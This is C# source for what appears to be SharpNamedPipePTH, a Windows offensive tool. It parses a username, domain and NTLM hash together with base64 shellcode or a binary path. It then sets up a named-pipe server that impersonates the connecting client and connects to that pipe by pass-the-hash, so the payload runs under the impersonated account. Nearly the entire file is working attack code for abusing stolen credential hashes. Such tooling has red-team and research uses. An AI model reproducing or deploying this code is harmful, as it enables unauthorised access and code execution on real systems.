//Argument parsing class from Rubeus (https://github.com/GhostPack/Rubeus/)
//Author: @Harmj0y
public static ArgumentParserResult Parse(IEnumerable <string> args)
{
var arguments = new Dictionary <string, string>();
try
{
foreach (var argument in args)
{
var idx = argument.IndexOf(':');
if (idx > 0)
{
arguments[argument.Substring(0, idx).ToLower()] = argument.Substring(idx + 1);
}
else if (argument.ToLower() == "-debug")
{
arguments["debugging"] = "true";
}
else if (argument.ToLower() == "-h")
{
arguments["showhelp"] = "true";
}
else if (argument.ToLower() == "-help")
{
arguments["showhelp"] = "true";
}
else if (argument.ToLower() == "-checkadmin")
{
arguments["admincheck"] = "true";
}
else if (argument.ToLower() == "-forcesmb1")
{
arguments["forcesmb1"] = "true";
}
else if (argument.ToLower() == "-smb1")
{
arguments["forcesmb1"] = "true";
}
else if (argument.ToLower() == "-comspec")
{
arguments["comspec"] = "true";
}
else
{
arguments[argument] = string.Empty;
}
}
return(ArgumentParserResult.Success(arguments));
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message);
return(ArgumentParserResult.Failure());
}
}
public static void Main(string[] args)
{
//User Set
string username = "";
string domain = ".";
string pipename = "ShitSecure";
string hash = "";
bool ForceSMB1 = false;
string binary = "";
string shellcode = "";
bool usernamegiven = false;
bool hashgiven = false;
bool shellcodegiven = false;
bool binarygiven = false;
try
{
if (args.Length < 1)
{
displayHelp("Usage:");
return;
}
ArgumentParserResult arguments = ArgParse.Parse(args);
if (arguments.ParsedOk == false)
{
displayHelp("Error Parsing Arguments");
return;
}
if (arguments.Arguments.ContainsKey("showhelp"))
{
displayHelp("Usage:");
return;
}
if (arguments.Arguments.ContainsKey("-h"))
{
displayHelp("Usage:");
return;
}
if (arguments.Arguments.ContainsKey("pipename"))
{
pipename = arguments.Arguments["pipename"];
}
if (arguments.Arguments.ContainsKey("shellcode"))
{
shellcode = arguments.Arguments["shellcode"];
shellcodegiven = true;
}
if (arguments.Arguments.ContainsKey("binary"))
{
binary = arguments.Arguments["binary"];
binarygiven = true;
}
if (arguments.Arguments.ContainsKey("forcesmb1"))
{
ForceSMB1 = true;
}
if (arguments.Arguments.ContainsKey("hash"))
{
hash = arguments.Arguments["hash"];
hashgiven = true;
}
if (arguments.Arguments.ContainsKey("username"))
{
username = arguments.Arguments["username"];
usernamegiven = true;
}
if (arguments.Arguments.ContainsKey("domain"))
{
domain = arguments.Arguments["domain"];
}
if (!(usernamegiven && hashgiven && (shellcodegiven || binarygiven)))
{
Console.WriteLine(usernamegiven);
Console.WriteLine(hashgiven);
Console.WriteLine(shellcodegiven);
Console.WriteLine(binarygiven);
displayHelp("Usage:");
return;
}
}
catch
{
displayHelp("Error Parsing Arguments");
return;
}
//Change WINSTA/DESKTOP Permissions
GrantAccessToWindowStationAndDesktop(username);
// Start Pipe Server
Console.WriteLine("Starting Pipe Server Thread!");
if (shellcodegiven)
{
byte[] shellcodebytes = Convert.FromBase64String(shellcode);
Thread t = new Thread(() => SharpNamedPipePTH.PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes));
t.Start();
}
else
{
byte[] shellcodebytes = null;
Thread t = new Thread(() => SharpNamedPipePTH.PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes));
t.Start();
}
// Connect to the Named Pipe via NamedPipePTH
Console.WriteLine($"Connecting to the Named Pipe via Pass-the-Hash - using username {username}");
Thread.Sleep(4000);
SharpNamedPipePTH.NamedpipePTH.NamedPipePTH(username, domain, hash, pipename, ForceSMB1);
}
